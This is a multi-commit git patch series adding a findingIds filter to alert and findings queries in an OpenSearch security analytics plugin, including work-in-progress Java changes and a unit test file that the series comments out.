From 3f77611aa8690bf2b8b20a02c47361f21cfd5a1e Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Sun, 15 Oct 2023 20:01:09 -0400 Subject: [PATCH 01/11] Test for the type of function used to use findingIds Signed-off-by: Ishan Bhat --- .../action/GetAlertsRequest.java | 15 +++++++++++++++ .../action/GetFindingsRequest.java | 7 +++++++ .../securityanalytics/alerts/AlertsService.java | 4 ++++ .../findings/FindingsService.java | 4 +++- .../resthandler/RestGetAlertsAction.java | 5 +++++ .../resthandler/RestGetFindingsAction.java | 2 ++ .../transport/TransportGetAlertsAction.java | 4 ++++ .../transport/TransportGetFindingsAction.java | 4 ++++ 8 files changed, 44 insertions(+), 1 deletion(-) diff --git a/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java b/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java index 1e0cb6113..beced05e2 100644 --- a/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java +++ b/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java @@ -19,6 +19,7 @@ public class GetAlertsRequest extends ActionRequest { private String detectorId; + private ArrayList findingIds; private String logType; private Table table; private String severityLevel; @@ -26,8 +27,11 @@ public class GetAlertsRequest extends ActionRequest { public static final String DETECTOR_ID = "detector_id"; + + // Updated the constructor to include findingIds public GetAlertsRequest( String detectorId, + ArrayList findingIds, String logType, Table table, String severityLevel, @@ -35,14 +39,18 @@ public GetAlertsRequest( ) { super(); this.detectorId = detectorId; + this.findingIds = findingIds; this.logType = logType; this.table = table; this.severityLevel = severityLevel; this.alertState = alertState; } + + // Added the read for findingIds param public GetAlertsRequest(StreamInput sin) throws IOException { this( sin.readOptionalString(), + sin.readOptionalList(), sin.readOptionalString(), Table.readFrom(sin), sin.readString(), @@ -61,9 +69,11 @@ public ActionRequestValidationException validate() { return validationException; } + // Added the writeTo for findingIds @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalString(detectorId); + out.writeOptionalList(findingIds); out.writeOptionalString(logType); table.writeTo(out); out.writeString(severityLevel); @@ -89,4 +99,9 @@ public String getAlertState() { public String getLogType() { return logType; } + + // Getter Function for findingIds + public ArrayList getFindingIds() { + return findingIds; + } } diff --git a/src/main/java/org/opensearch/securityanalytics/action/GetFindingsRequest.java b/src/main/java/org/opensearch/securityanalytics/action/GetFindingsRequest.java index 8e99720ee..f7f49f6d8 100644 --- a/src/main/java/org/opensearch/securityanalytics/action/GetFindingsRequest.java +++ b/src/main/java/org/opensearch/securityanalytics/action/GetFindingsRequest.java @@ -22,15 +22,19 @@ public class GetFindingsRequest extends ActionRequest { private String detectorId; private Table table; + public static final String DETECTOR_ID = "detector_id"; public GetFindingsRequest(String detectorId) { super(); this.detectorId = detectorId; } + public GetFindingsRequest(StreamInput sin) throws IOException { this( + sin.readOptionalString(), + // sin.readOptionalList for arraylist findingIds sin.readOptionalString(), Table.readFrom(sin) ); @@ -38,6 +42,7 @@ public GetFindingsRequest(StreamInput sin) throws IOException { public GetFindingsRequest(String detectorId, String logType, Table table) { this.detectorId = detectorId; + // Updated param above this.logType = logType; this.table = table; } @@ -57,6 +62,7 @@ public ActionRequestValidationException validate() { public void writeTo(StreamOutput out) throws IOException { out.writeOptionalString(detectorId); out.writeOptionalString(logType); + // Write the finding ids table.writeTo(out); } @@ -71,4 +77,5 @@ public String getLogType() { public Table getTable() { return table; } + } \ No newline at end of file diff --git a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java index a61fe9d35..e27178f08 100644 --- a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java +++ b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java @@ -56,6 +56,7 @@ public AlertsService(Client client) { * Searches alerts generated by specific Detector * * @param detectorId id of Detector + * @param findingIds finding id of detector to search alerts on * @param table group of search related parameters * @param severityLevel alert severity level * @param alertState current alert state @@ -63,6 +64,7 @@ public AlertsService(Client client) { */ public void getAlertsByDetectorId( String detectorId, + ArrayList findingIds, Table table, String severityLevel, String alertState, @@ -134,6 +136,8 @@ public void getAlertsByMonitorIds( org.opensearch.commons.alerting.action.GetAlertsRequest req = new org.opensearch.commons.alerting.action.GetAlertsRequest( + // Pass list of findingIds, needs to be created + findingIds, table, severityLevel, alertState, diff --git a/src/main/java/org/opensearch/securityanalytics/findings/FindingsService.java b/src/main/java/org/opensearch/securityanalytics/findings/FindingsService.java index 4674f40cc..7b8a80c83 100644 --- a/src/main/java/org/opensearch/securityanalytics/findings/FindingsService.java +++ b/src/main/java/org/opensearch/securityanalytics/findings/FindingsService.java @@ -52,6 +52,8 @@ public FindingsService(Client client) { * @param table group of search related parameters * @param listener ActionListener to get notified on response or error */ + + // This is the function and add a new parameter for finding ids public void getFindingsByDetectorId(String detectorId, Table table, ActionListener listener ) { this.client.execute(GetDetectorAction.INSTANCE, new GetDetectorRequest(detectorId, -3L), new ActionListener<>() { @@ -131,7 +133,7 @@ public void getFindingsByMonitorIds( org.opensearch.commons.alerting.action.GetFindingsRequest req = new org.opensearch.commons.alerting.action.GetFindingsRequest( - null, + null, // Need to pass the findingId as List but in api it is a sting[it will change] table, null, findingIndexName, diff --git a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java index 0d6bcb52d..a4a1cb5c4 100644 --- a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java +++ b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java @@ -34,6 +34,9 @@ public String getName() { protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient client) throws IOException { String detectorId = request.param("detector_id", null); + // Need to add the param findingIds + List findingIds = request.paramAsArrayList("findingIds", null); + String detectorType = request.param("detectorType", null); String severityLevel = request.param("severityLevel", "ALL"); String alertState = request.param("alertState", "ALL"); @@ -56,12 +59,14 @@ protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient cli GetAlertsRequest req = new GetAlertsRequest( detectorId, + findingIds, detectorType, table, severityLevel, alertState ); + // Request goes to TransportGetAlertsRequest class return channel -> client.execute( GetAlertsAction.INSTANCE, req, diff --git a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetFindingsAction.java b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetFindingsAction.java index efc04e1e5..509ce2a18 100644 --- a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetFindingsAction.java +++ b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetFindingsAction.java @@ -52,10 +52,12 @@ protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient cli GetFindingsRequest req = new GetFindingsRequest( detectorId, + // Add finding ids detectorType, table ); + // Request goes to TransportGetFindingsAction class return channel -> client.execute( GetFindingsAction.INSTANCE, req, diff --git a/src/main/java/org/opensearch/securityanalytics/transport/TransportGetAlertsAction.java b/src/main/java/org/opensearch/securityanalytics/transport/TransportGetAlertsAction.java index f01929fc9..8512941cb 100644 --- a/src/main/java/org/opensearch/securityanalytics/transport/TransportGetAlertsAction.java +++ b/src/main/java/org/opensearch/securityanalytics/transport/TransportGetAlertsAction.java @@ -74,6 +74,7 @@ public TransportGetAlertsAction(TransportService transportService, ActionFilters this.clusterService.getClusterSettings().addSettingsUpdateConsumer(SecurityAnalyticsSettings.FILTER_BY_BACKEND_ROLES, this::setFilterByEnabled); } + // The client request hits here @Override protected void doExecute(Task task, GetAlertsRequest request, ActionListener actionListener) { @@ -88,6 +89,8 @@ protected void doExecute(Task task, GetAlertsRequest request, ActionListener actionListener) { @@ -106,6 +108,7 @@ protected void doExecute(Task task, GetFindingsRequest request, ActionListener Date: Thu, 26 Oct 2023 10:43:30 -0400 Subject: [PATCH 02/11] work on lists Signed-off-by: Ishan Bhat --- .../securityanalytics/alerts/AlertsService.java | 3 ++- .../resthandler/RestGetAlertsAction.java | 15 +++++++++++++-- 2 files changed, 15 insertions(+), 3 deletions(-) diff --git a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java index e27178f08..67c1ce2eb 100644 --- a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java +++ b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java @@ -136,7 +136,7 @@ public void getAlertsByMonitorIds( org.opensearch.commons.alerting.action.GetAlertsRequest req = new org.opensearch.commons.alerting.action.GetAlertsRequest( - // Pass list of findingIds, needs to be created + // Pass list of findingIds. Needs to be created by mentor findingIds, table, severityLevel, @@ -178,6 +178,7 @@ void setIndicesAdminClient(Client client) { public void getAlerts( List detectors, + ArrayList findingIds, String logType, Table table, String severityLevel, diff --git a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java index a4a1cb5c4..449f66093 100644 --- a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java +++ b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java @@ -35,7 +35,7 @@ protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient cli String detectorId = request.param("detector_id", null); // Need to add the param findingIds - List findingIds = request.paramAsArrayList("findingIds", null); + String [] findingIds = request.paramAsStringArray("findingIds", null); String detectorType = request.param("detectorType", null); String severityLevel = request.param("severityLevel", "ALL"); @@ -59,7 +59,7 @@ protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient cli GetAlertsRequest req = new GetAlertsRequest( detectorId, - findingIds, + getFindingIdsasList(findingIds), detectorType, table, severityLevel, @@ -78,4 +78,15 @@ protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient cli public List routes() { return singletonList(new Route(GET, SecurityAnalyticsPlugin.ALERTS_BASE_URI)); } + + public getFindingIdsasList(String [] findingIds) { + // Need to add the logic to convert findingIds to a list + List findingIdsList = new ArrayList<>(); + + for (String id : findingIds) { + findingIdsList.add(id); + } + + return findingIdsList; + } } \ No newline at end of file From c75f5d998530fe1ebea4bff40e478879864011f5 Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Tue, 7 Nov 2023 20:51:39 -0500 Subject: [PATCH 03/11] debugging the pr Signed-off-by: Ishan Bhat --- .../action/GetAlertsRequest.java | 33 +++++++++++-------- .../alerts/AlertsService.java | 8 +++++ .../resthandler/RestGetAlertsAction.java | 29 +++++++--------- 3 files changed, 40 insertions(+), 30 deletions(-) diff --git a/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java b/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java index beced05e2..4b30267ae 100644 --- a/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java +++ b/src/main/java/org/opensearch/securityanalytics/action/GetAlertsRequest.java @@ -6,6 +6,8 @@ import java.io.IOException; import java.util.Locale; +import java.util.ArrayList; +import java.util.List; import org.opensearch.action.ActionRequest; import org.opensearch.action.ActionRequestValidationException; import org.opensearch.core.common.io.stream.StreamInput; @@ -45,18 +47,23 @@ public GetAlertsRequest( this.severityLevel = severityLevel; this.alertState = alertState; } - - // Added the read for findingIds param - public GetAlertsRequest(StreamInput sin) throws IOException { - this( - sin.readOptionalString(), - sin.readOptionalList(), - sin.readOptionalString(), - Table.readFrom(sin), - sin.readString(), - sin.readString() - ); - } + +public GetAlertsRequest(StreamInput sin) throws IOException { + super(); + + this.detectorId = sin.readOptionalString(); + + List findingIdsList = sin.readStringList(); + this.findingIds = findingIdsList != null ? new ArrayList<>(findingIdsList) : new ArrayList<>(); + + this.logType = sin.readOptionalString(); + this.table = Table.readFrom(sin); + this.severityLevel = sin.readString(); + this.alertState = sin.readString(); +} + + + @Override public ActionRequestValidationException validate() { @@ -73,7 +80,7 @@ public ActionRequestValidationException validate() { @Override public void writeTo(StreamOutput out) throws IOException { out.writeOptionalString(detectorId); - out.writeOptionalList(findingIds); + out.writeStringCollection(findingIds); out.writeOptionalString(logType); table.writeTo(out); out.writeString(severityLevel); diff --git a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java index 67c1ce2eb..511324660 100644 --- a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java +++ b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java @@ -83,9 +83,11 @@ public void onResponse(GetDetectorResponse getDetectorResponse) { monitorId -> monitorToDetectorMapping.put(monitorId, detector.getId()) ); // Get alerts for all monitor ids + // Do i need to add finding IDs for this method? Line 128 another doubt AlertsService.this.getAlertsByMonitorIds( monitorToDetectorMapping, monitorIds, + findingIds, DetectorMonitorConfig.getAllAlertsIndicesPattern(detector.getDetectorType()), table, severityLevel, @@ -124,9 +126,13 @@ public void onFailure(Exception e) { * @param alertState current alert state * * @param listener ActionListener to get notified on response or error */ + + // Do I add finding Ids for this method? + public void getAlertsByMonitorIds( Map monitorToDetectorMapping, List monitorIds, + List findingIds, String alertIndex, Table table, String severityLevel, @@ -205,6 +211,7 @@ public void getAlerts( AlertsService.this.getAlertsByMonitorIds( monitorToDetectorMapping, allMonitorIds, + findingIds, DetectorMonitorConfig.getAllAlertsIndicesPattern(logType), table, severityLevel, @@ -248,6 +255,7 @@ private AlertDto mapAlertToAlertDto(Alert alert, String detectorId) { ); } + // Check where exactly is this method used? public void getAlerts(List alertIds, Detector detector, Table table, diff --git a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java index 449f66093..f3c5d4da5 100644 --- a/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java +++ b/src/main/java/org/opensearch/securityanalytics/resthandler/RestGetAlertsAction.java @@ -6,6 +6,7 @@ import java.io.IOException; import java.util.List; +import java.util.ArrayList; import java.util.Locale; import org.opensearch.client.node.NodeClient; import org.opensearch.commons.alerting.model.Table; @@ -19,8 +20,8 @@ import org.opensearch.securityanalytics.action.GetFindingsRequest; import org.opensearch.securityanalytics.model.Detector; - import static java.util.Collections.singletonList; +import java.util.Arrays; import static org.opensearch.rest.RestRequest.Method.GET; public class RestGetAlertsAction extends BaseRestHandler { @@ -32,11 +33,8 @@ public String getName() { @Override protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient client) throws IOException { - String detectorId = request.param("detector_id", null); - // Need to add the param findingIds - String [] findingIds = request.paramAsStringArray("findingIds", null); - + String[] findingIds = request.paramAsStringArray("findingIds", null); String detectorType = request.param("detectorType", null); String severityLevel = request.param("severityLevel", "ALL"); String alertState = request.param("alertState", "ALL"); @@ -59,14 +57,14 @@ protected RestChannelConsumer prepareRequest(RestRequest request, NodeClient cli GetAlertsRequest req = new GetAlertsRequest( detectorId, - getFindingIdsasList(findingIds), + convertFindingIdsToList(findingIds), detectorType, table, severityLevel, alertState ); - // Request goes to TransportGetAlertsRequest class + // Request goes to TransportGetAlertsAction class return channel -> client.execute( GetAlertsAction.INSTANCE, req, @@ -79,14 +77,11 @@ public List routes() { return singletonList(new Route(GET, SecurityAnalyticsPlugin.ALERTS_BASE_URI)); } - public getFindingIdsasList(String [] findingIds) { - // Need to add the logic to convert findingIds to a list - List findingIdsList = new ArrayList<>(); - - for (String id : findingIds) { - findingIdsList.add(id); - } - - return findingIdsList; + private ArrayList convertFindingIdsToList(String[] findingIds) { + if (findingIds == null) { + return new ArrayList<>(); } -} \ No newline at end of file + return new ArrayList<>(Arrays.asList(findingIds)); +} + +} From fee3e22c99cee5be3ed0e69eafe5b7beec4a382c Mon Sep 17 00:00:00 2001 From: Ishan Bhat Date: Tue, 7 Nov 2023 21:47:36 -0500 Subject: [PATCH 04/11] OSCI - Debugging Signed-off-by: Ishan Bhat --- .../alerts/AlertsService.java | 2 +- .../alerts/AlertingServiceTests.java | 482 +++++++++--------- .../securityanalytics/alerts/AlertsIT.java | 2 +- 3 files changed, 242 insertions(+), 244 deletions(-) diff --git a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java index 511324660..c136eeb34 100644 --- a/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java +++ b/src/main/java/org/opensearch/securityanalytics/alerts/AlertsService.java @@ -143,7 +143,7 @@ public void getAlertsByMonitorIds( org.opensearch.commons.alerting.action.GetAlertsRequest req = new org.opensearch.commons.alerting.action.GetAlertsRequest( // Pass list of findingIds. Needs to be created by mentor - findingIds, + // findingIds, table, severityLevel, alertState, diff --git a/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java b/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java index d250d2eef..48205d134 100644 --- a/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java +++ b/src/test/java/org/opensearch/securityanalytics/alerts/AlertingServiceTests.java @@ -1,44 +1,44 @@ -/* - * Copyright OpenSearch Contributors - * SPDX-License-Identifier: Apache-2.0 - */ +// /* +// * Copyright OpenSearch Contributors +// * SPDX-License-Identifier: Apache-2.0 +// */ -package org.opensearch.securityanalytics.alerts; +// package org.opensearch.securityanalytics.alerts; -import java.time.Instant; -import java.time.ZoneId; -import java.util.Collections; -import java.util.List; -import java.util.Map; -import org.opensearch.core.action.ActionListener; -import org.opensearch.client.Client; -import org.opensearch.commons.alerting.model.Alert; -import org.opensearch.commons.alerting.model.CronSchedule; -import org.opensearch.commons.alerting.model.DataSources; -import org.opensearch.commons.alerting.model.DocumentLevelTrigger; -import org.opensearch.commons.alerting.model.Monitor; -import org.opensearch.commons.alerting.model.Table; -import org.opensearch.core.rest.RestStatus; -import org.opensearch.script.Script; -import org.opensearch.securityanalytics.action.AlertDto; -import org.opensearch.securityanalytics.action.GetAlertsResponse; -import org.opensearch.securityanalytics.action.GetDetectorAction; -import org.opensearch.securityanalytics.action.GetDetectorRequest; -import org.opensearch.securityanalytics.action.GetDetectorResponse; -import org.opensearch.securityanalytics.config.monitors.DetectorMonitorConfig; -import org.opensearch.securityanalytics.model.Detector; -import org.opensearch.securityanalytics.transport.TransportIndexDetectorAction; -import org.opensearch.test.OpenSearchTestCase; +// import java.time.Instant; +// import java.time.ZoneId; +// import java.util.Collections; +// import java.util.List; +// import java.util.Map; +// import org.opensearch.core.action.ActionListener; +// import org.opensearch.client.Client; +// import org.opensearch.commons.alerting.model.Alert; +// import org.opensearch.commons.alerting.model.CronSchedule; +// import org.opensearch.commons.alerting.model.DataSources; +// import org.opensearch.commons.alerting.model.DocumentLevelTrigger; +// import org.opensearch.commons.alerting.model.Monitor; +// import org.opensearch.commons.alerting.model.Table; +// import org.opensearch.core.rest.RestStatus; +// import org.opensearch.script.Script; +// import org.opensearch.securityanalytics.action.AlertDto; +// import org.opensearch.securityanalytics.action.GetAlertsResponse; +// import org.opensearch.securityanalytics.action.GetDetectorAction; +// import org.opensearch.securityanalytics.action.GetDetectorRequest; +// import org.opensearch.securityanalytics.action.GetDetectorResponse; +// import org.opensearch.securityanalytics.config.monitors.DetectorMonitorConfig; +// import org.opensearch.securityanalytics.model.Detector; +// import org.opensearch.securityanalytics.transport.TransportIndexDetectorAction; +// import org.opensearch.test.OpenSearchTestCase; -import static org.mockito.ArgumentMatchers.any; -import static org.mockito.ArgumentMatchers.anyString; -import static org.mockito.ArgumentMatchers.eq; -import static org.mockito.Mockito.doAnswer; -import static org.mockito.Mockito.mock; -import static org.mockito.Mockito.spy; +// import static org.mockito.ArgumentMatchers.any; +// import static org.mockito.ArgumentMatchers.anyString; +// import static org.mockito.ArgumentMatchers.eq; +// import static org.mockito.Mockito.doAnswer; +// import static org.mockito.Mockito.mock; +// import static org.mockito.Mockito.spy; -public class AlertingServiceTests extends OpenSearchTestCase { +// public class AlertingServiceTests extends OpenSearchTestCase { public void testGetAlerts_success() { AlertsService alertssService = spy(AlertsService.class); @@ -65,159 +65,158 @@ public void testGetAlerts_success() { null, DetectorMonitorConfig.getFindingsIndex("others_application"), Collections.emptyMap(), - Collections.emptyList(), - false + Collections.emptyList() ); GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); - // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse - doAnswer(invocation -> { - ActionListener l = invocation.getArgument(2); - l.onResponse(getDetectorResponse); - return null; - }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); +// // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse +// doAnswer(invocation -> { +// ActionListener l = invocation.getArgument(2); +// l.onResponse(getDetectorResponse); +// return null; +// }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); - // Alerting GetAlertsResponse mock #1 - Alert alert1 = new Alert( - "alert_id_1", - new Monitor( - "monitor_id_1", - -3, - "monitor_name", - true, - new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), - Instant.now(), - Instant.now(), - Monitor.MonitorType.DOC_LEVEL_MONITOR, - null, - 1, - List.of(), - List.of(), - Map.of(), - new DataSources(), - TransportIndexDetectorAction.PLUGIN_OWNER_FIELD - ), - new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), - List.of("finding_id_1"), - List.of("docId1"), - Instant.now(), - Instant.now(), - Alert.State.COMPLETED, - null, - List.of(), - List.of(), - 3, - null, - null - ); +// // Alerting GetAlertsResponse mock #1 +// Alert alert1 = new Alert( +// "alert_id_1", +// new Monitor( +// "monitor_id_1", +// -3, +// "monitor_name", +// true, +// new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), +// Instant.now(), +// Instant.now(), +// Monitor.MonitorType.DOC_LEVEL_MONITOR, +// null, +// 1, +// List.of(), +// List.of(), +// Map.of(), +// new DataSources(), +// TransportIndexDetectorAction.PLUGIN_OWNER_FIELD +// ), +// new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), +// List.of("finding_id_1"), +// List.of("docId1"), +// Instant.now(), +// Instant.now(), +// Alert.State.COMPLETED, +// null, +// List.of(), +// List.of(), +// 3, +// null, +// null +// ); - Alert alert2 = new Alert( - "alert_id_1", - new Monitor( - "monitor_id_1", - -3, - "monitor_name", - true, - new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), - Instant.now(), - Instant.now(), - Monitor.MonitorType.DOC_LEVEL_MONITOR, - null, - 1, - List.of(), - List.of(), - Map.of(), - new DataSources(), - TransportIndexDetectorAction.PLUGIN_OWNER_FIELD - ), - new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), - List.of("finding_id_1"), - List.of("docId1"), - Instant.now(), - Instant.now(), - Alert.State.COMPLETED, - null, - List.of(), - List.of(), - 3, - null, - null - ); +// Alert alert2 = new Alert( +// "alert_id_1", +// new Monitor( +// "monitor_id_1", +// -3, +// "monitor_name", +// true, +// new CronSchedule("31 * * * *", ZoneId.of("Asia/Kolkata"), Instant.ofEpochSecond(1538164858L)), +// Instant.now(), +// Instant.now(), +// Monitor.MonitorType.DOC_LEVEL_MONITOR, +// null, +// 1, +// List.of(), +// List.of(), +// Map.of(), +// new DataSources(), +// TransportIndexDetectorAction.PLUGIN_OWNER_FIELD +// ), +// new DocumentLevelTrigger("trigger_id_1", "my_trigger", "severity_low", List.of(), new Script("")), +// List.of("finding_id_1"), +// List.of("docId1"), +// Instant.now(), +// Instant.now(), +// Alert.State.COMPLETED, +// null, +// List.of(), +// List.of(), +// 3, +// null, +// null +// ); - GetAlertsResponse getAlertsResponse = new GetAlertsResponse( - List.of(new AlertDto( - detector.getId(), - alert1.getId(), - alert1.getVersion(), - alert1.getSchemaVersion(), - alert1.getTriggerId(), - alert1.getTriggerName(), - alert1.getFindingIds(), - alert1.getRelatedDocIds(), - alert1.getState(), - alert1.getStartTime(), - alert1.getEndTime(), - alert1.getLastNotificationTime(), - alert1.getAcknowledgedTime(), - alert1.getErrorMessage(), - alert1.getErrorHistory(), - alert1.getSeverity(), - alert1.getActionExecutionResults(), - alert1.getAggregationResultBucket() - ), - new AlertDto( - detector.getId(), - alert2.getId(), - alert2.getVersion(), - alert2.getSchemaVersion(), - alert2.getTriggerId(), - alert2.getTriggerName(), - alert2.getFindingIds(), - alert2.getRelatedDocIds(), - alert2.getState(), - alert2.getStartTime(), - alert2.getEndTime(), - alert2.getLastNotificationTime(), - alert2.getAcknowledgedTime(), - alert2.getErrorMessage(), - alert2.getErrorHistory(), - alert2.getSeverity(), - alert2.getActionExecutionResults(), - alert2.getAggregationResultBucket() - ) - ), 2 - ); +// GetAlertsResponse getAlertsResponse = new GetAlertsResponse( +// List.of(new AlertDto( +// detector.getId(), +// alert1.getId(), +// alert1.getVersion(), +// alert1.getSchemaVersion(), +// alert1.getTriggerId(), +// alert1.getTriggerName(), +// alert1.getFindingIds(), +// alert1.getRelatedDocIds(), +// alert1.getState(), +// alert1.getStartTime(), +// alert1.getEndTime(), +// alert1.getLastNotificationTime(), +// alert1.getAcknowledgedTime(), +// alert1.getErrorMessage(), +// alert1.getErrorHistory(), +// alert1.getSeverity(), +// alert1.getActionExecutionResults(), +// alert1.getAggregationResultBucket() +// ), +// new AlertDto( +// detector.getId(), +// alert2.getId(), +// alert2.getVersion(), +// alert2.getSchemaVersion(), +// alert2.getTriggerId(), +// alert2.getTriggerName(), +// alert2.getFindingIds(), +// alert2.getRelatedDocIds(), +// alert2.getState(), +// alert2.getStartTime(), +// alert2.getEndTime(), +// alert2.getLastNotificationTime(), +// alert2.getAcknowledgedTime(), +// alert2.getErrorMessage(), +// alert2.getErrorHistory(), +// alert2.getSeverity(), +// alert2.getActionExecutionResults(), +// alert2.getAggregationResultBucket() +// ) +// ), 2 +// ); - doAnswer(invocation -> { - ActionListener l = invocation.getArgument(6); - l.onResponse(getAlertsResponse); - return null; - }).when(alertssService).getAlertsByMonitorIds(any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); +// doAnswer(invocation -> { +// ActionListener l = invocation.getArgument(6); +// l.onResponse(getAlertsResponse); +// return null; +// }).when(alertssService).getAlertsByMonitorIds(any(), any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); - // Call getFindingsByDetectorId - Table table = new Table( - "asc", - "id", - null, - 100, - 0, - null - ); - alertssService.getAlertsByDetectorId("detector_id123", table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { - @Override - public void onResponse(GetAlertsResponse getAlertsResponse) { - assertEquals(2, (int)getAlertsResponse.getTotalAlerts()); - assertEquals(2, getAlertsResponse.getAlerts().size()); - } +// // Call getFindingsByDetectorId +// Table table = new Table( +// "asc", +// "id", +// null, +// 100, +// 0, +// null +// ); +// alertssService.getAlertsByDetectorId("detector_id123", new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { +// @Override +// public void onResponse(GetAlertsResponse getAlertsResponse) { +// assertEquals(2, (int)getAlertsResponse.getTotalAlerts()); +// assertEquals(2, getAlertsResponse.getAlerts().size()); +// } - @Override - public void onFailure(Exception e) { +// @Override +// public void onFailure(Exception e) { - } - }); - } +// } +// }); +// } - public void testGetFindings_getFindingsByMonitorIdFailures() { +// public void testGetFindings_getFindingsByMonitorIdFailures() { AlertsService alertssService = spy(AlertsService.class); Client client = mock(Client.class); @@ -243,78 +242,77 @@ public void testGetFindings_getFindingsByMonitorIdFailures() { null, DetectorMonitorConfig.getFindingsIndex("others_application"), Collections.emptyMap(), - Collections.emptyList(), - false + Collections.emptyList() ); GetDetectorResponse getDetectorResponse = new GetDetectorResponse("detector_id123", 1L, RestStatus.OK, detector); - // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse - doAnswer(invocation -> { - ActionListener l = invocation.getArgument(2); - l.onResponse(getDetectorResponse); - return null; - }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); +// // Setup getDetector interceptor and return fake GetDetectorResponse by calling listener.onResponse +// doAnswer(invocation -> { +// ActionListener l = invocation.getArgument(2); +// l.onResponse(getDetectorResponse); +// return null; +// }).when(client).execute(eq(GetDetectorAction.INSTANCE), any(GetDetectorRequest.class), any(ActionListener.class)); - doAnswer(invocation -> { - ActionListener l = invocation.getArgument(6); - l.onFailure(new IllegalArgumentException("Error getting findings")); - return null; - }).when(alertssService).getAlertsByMonitorIds(any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); +// doAnswer(invocation -> { +// ActionListener l = invocation.getArgument(6); +// l.onFailure(new IllegalArgumentException("Error getting findings")); +// return null; +// }).when(alertssService).getAlertsByMonitorIds(any(), any(), any(), anyString(), any(Table.class), anyString(), anyString(), any(ActionListener.class)); - // Call getFindingsByDetectorId - Table table = new Table( - "asc", - "id", - null, - 100, - 0, - null - ); - alertssService.getAlertsByDetectorId("detector_id123", table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { - @Override - public void onResponse(GetAlertsResponse getAlertsResponse) { - fail("this test should've failed"); - } +// // Call getFindingsByDetectorId +// Table table = new Table( +// "asc", +// "id", +// null, +// 100, +// 0, +// null +// ); +// alertssService.getAlertsByDetectorId("detector_id123",new ArrayList(), table, "severity_low", Alert.State.COMPLETED.toString(), new ActionListener<>() { +// @Override +// public void onResponse(GetAlertsResponse getAlertsResponse) { +// fail("this test should've failed"); +// } - @Override - public void onFailure(Exception e) { - assertTrue(e.getMessage().contains("Error getting findings")); - } - }); - } +// 